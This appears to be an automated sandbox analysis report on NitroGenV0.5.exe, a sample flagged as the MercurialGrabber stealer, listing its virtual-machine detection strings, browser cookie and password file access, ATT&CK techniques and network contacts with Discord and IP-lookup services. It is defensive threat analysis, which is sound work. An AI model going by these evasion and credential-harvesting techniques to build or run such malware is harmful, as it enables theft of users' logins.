Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99906
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99797
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation (2 occurrences)
Source: NitroGenV0.5.exe.6.dr Binary or memory string: SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: NitroGenV0.5.exe, 00000011.00000002.351226359.000000001C976000.00000004.00000001.sdmp Binary or memory string: VMware
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: ISYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: KSYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: NitroGenV0.5.exe.6.dr Binary or memory string: vmware
Source: NitroGenV0.5.exe, 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr Binary or memory string: virtualboxvboxqemu
Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: NitroGenV0.5.exe Binary or memory string: SOFTWARE\VMWare, Inc.\VMWare Tools
Source: wget.exe, NitroGenV0.5.exe, 00000006.00000003.301890578.0000000000F23000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: NitroGenV0.5.exe, 00000006.00000002.304952361.000000001BC13000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoControllerGBBSEH4DVideoController120060621000000.000000-00093469586display.infMSBDAPMDL4PPYPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE6F_LCFCaPrYY
Source: NitroGenV0.5.exe Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: NitroGenV0.5.exe, 00000011.00000002.351226359.000000001C976000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoControllerGBBSEH4DVideoController120060621000000.000000-00093469586display.infMSBDAPMDL4PPYPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE6F_LCFC
Source: NitroGenV0.5.exe, 00000011.00000002.350055756.0000000000A5C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: "SOFTWARE\VMWare, Inc.\VMWare Tools
Source: NitroGenV0.5.exe, 00000006.00000002.303503092.000000001BB70000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: NitroGenV0.5.exe.6.dr Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdevkSYSTEM\CurrentControlSet\Control\VirtualDeviceDriversESOFTWARE\VMWare, Inc.\VMWare ToolsUSOFTWARE\Oracle\VirtualBox Guest Additions1HARDWARE\ACPI\DSDT\VBOX_SSYSTEM\ControlSet001\Services\Disk\Enum\0cHARDWARE\Description\System\SystemBiosInformationYHARDWARE\Description\System\VideoBiosVersion]HARDWARE\Description\System\SystemManufacturer[HARDWARE\Description\System\SystemProductName[HARDWARE\Description\System\Logical Unit Id 0
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Memory allocated: page read and write | page guard
Source: C:\Windows\SysWOW64\wget.exe Queries volume information: C:\Users\user\Desktop\download VolumeInformation
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Queries volume information: C:\Users\user\Desktop\download\NitroGenV0.5.exe VolumeInformation
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Queries volume information: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (4 occurrences)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Windows\SysWOW64\wget.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected MercurialGrabber
Source: Yara match, File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Cookies
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data

Remote Access Functionality:

Yara detected MercurialGrabber
Source: Yara match, File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED

Mitre Att&ck Matrix

Techniques listed per tactic column of the matrix (bracketed digits are the report's per-technique hit-count badges, kept as extracted):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation [3], Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
Persistence: Registry Run Keys / Startup Folder [1], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: Process Injection [1], Registry Run Keys / Startup Folder [1], Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [231], Process Injection [1], Obfuscated Files or Information [1], Software Packing [1]
Credential Access: OS Credential Dumping [1], LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery [311], Process Discovery [1], Virtualization/Sandbox Evasion [231], Application Window Discovery [1], Remote System Discovery [1], System Information Discovery [33]
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data [1], Data from Local System [1], Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: Encrypted Channel [21], Ingress Tool Transfer [1], Non-Application Layer Protocol [3], Application Layer Protocol [14], Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features

                        Behavior Graph


                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        Behavior Graph ID: 517177
                        URL: https://cdn.discordapp.com/...
                        Startdate: 07/11/2021
                        Architecture: WINDOWS
                        Score: 100

                        Top-level signatures:
                        • Found malware configuration
                        • Malicious sample detected (through community Yara rule)
                        • Yara detected MercurialGrabber
                        • C2 URLs / IPs found in malware configuration

                        Processes started at the top level (the two numbers after a process name are the counts shown in the graph):

                        NitroGenV0.5.exe 15 11
                        • DNS/IP: discord.com 162.159.136.232, 443, 49744, 49745 CLOUDFLARENETUS United States
                        • DNS/IP: ip-api.com 208.95.112.1, 49743, 49756, 80 TUT-ASUS United States
                        • DNS/IP: ip4.seeip.org 23.128.64.141, 443, 49742, 49755 JOESDATACENTERUS United States
                        • Dropped: C:\Users\user\AppData\...\NitroGenV0.5.exe, PE32
                        • Dropped: C:\Users\...\NitroGenV0.5.exe:Zone.Identifier, ASCII
                        • Signature: Antivirus detection for dropped file
                        • Signature: Detected unpacking (overwrites its own PE header)
                        • Signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        • Started: conhost.exe

                        NitroGenV0.5.exe 9
                        • DNS/IP: 162.159.135.232, 443, 49757, 49758 CLOUDFLARENETUS United States
                        • Signature: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                        • Signature: Tries to harvest and steal browser information (history, passwords, etc)
                        • Signature: Queries memory information (via WMI often done to detect virtual machines)
                        • Started: conhost.exe

                        cmd.exe 2
                        • Started: wget.exe 2
                          – DNS/IP: cdn.discordapp.com 162.159.129.233, 443, 49741 CLOUDFLARENETUS United States
                          – Dropped: C:\Users\user\Desktop\...\NitroGenV0.5.exe, PE32
                        • Started: conhost.exe

                        Screenshots
